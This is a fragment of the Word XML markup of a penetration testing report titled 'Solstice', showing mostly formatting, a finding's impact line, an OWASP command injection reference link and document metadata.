          <w:p w14:paraId="02701154" w14:textId="25182EE8" w:rsidR="00D43D23" w:rsidRDefault="00440943" w:rsidP="0044094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Loss</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of data integrity, confidentiality, and availability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="54CCDDF6" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64CBA5F0" w14:textId="0C9DDE77" w:rsidR="00D43D23" w:rsidRDefault="00D43D23">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">References </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A9D13C" w14:textId="58B2BBB5" w:rsidR="00D43D23" w:rsidRDefault="00440943">
            <w:r w:rsidRPr="00440943">
              <w:t>https://owasp.org/www-community/attacks/Command_Injection</w:t>
            </w:r>
          </w:p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default" r:id="rId24"/>
      <w:foot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DBD0AD" w14:textId="77777777" w:rsidR="00AE0686" w:rsidRDefault="00AE0686" w:rsidP="00D43D23">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0E45E9EC" w14:textId="77777777" w:rsidR="00AE0686" w:rsidRDefault="00AE0686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6F5A988F" w:rsidR="00D43D23" w:rsidRDefault="00AE0686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A14CD">
                <w:rPr>
                  <w:caps/>
                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>Penetration Testing Report – Solstice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609F1002" w:rsidR="00D43D23" w:rsidRDefault="002A11E5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1FC6A8" w14:textId="77777777" w:rsidR="00AE0686" w:rsidRDefault="00AE0686" w:rsidP="00D43D23">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7F978068" w14:textId="77777777" w:rsidR="00AE0686" w:rsidRDefault="00AE0686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0C4843B8" w:rsidR="00D43D23" w:rsidRDefault="00D43D23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Penetration Testing Report – </w:t>
                              </w:r>
                              <w:r w:rsidR="00AA14CD">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                </w:rPr>
                                <w:t>Solstice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0C4843B8" w:rsidR="00D43D23" w:rsidRDefault="00D43D23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Penetration Testing Report – </w:t>
                        </w:r>
                        <w:r w:rsidR="00AA14CD">
                          <w:rPr>
                            <w:caps/>
                            <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          </w:rPr>
                          <w:t>Solstice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60DAE"/>
    <w:rsid w:val="00122982"/>
    <w:rsid w:val="00162C1E"/>
    <w:rsid w:val="00164F70"/>
    <w:rsid w:val="00286F60"/>
    <w:rsid w:val="002A11E5"/>
    <w:rsid w:val="0037014D"/>
    <w:rsid w:val="003D1D02"/>
    <w:rsid w:val="00440943"/>
    <w:rsid w:val="004D7195"/>
    <w:rsid w:val="00614E08"/>
    <w:rsid w:val="006E552A"/>
    <w:rsid w:val="006F33C3"/>
    <w:rsid w:val="00A327B3"/>
    <w:rsid w:val="00AA14CD"/>
    <w:rsid w:val="00AA551C"/>
    <w:rsid w:val="00AE0686"/>
    <w:rsid w:val="00AF6F92"/>
    <w:rsid w:val="00B52CB8"/>
    <w:rsid w:val="00B73271"/>
    <w:rsid w:val="00BB6090"/>
    <w:rsid w:val="00BC0B6F"/>
    <w:rsid w:val="00D24F71"/>
    <w:rsid w:val="00D33049"/>
    <w:rsid w:val="00D43D23"/>
    <w:rsid w:val="00F168F1"/>
    <w:rsid w:val="00F46F13"/>
    <w:rsid w:val="00F9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4D7195"/>
    <w:rsid w:val="007A39D1"/>
    <w:rsid w:val="00BC2C8E"/>
    <w:rsid w:val="00ED0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8458F-EED9-4413-9831-2B3725DBD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Solstice</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2443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Solstice</dc:title>
  <dc:subject/>
  <dc:creator>Yash Pawar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-10T06:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-07T12:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>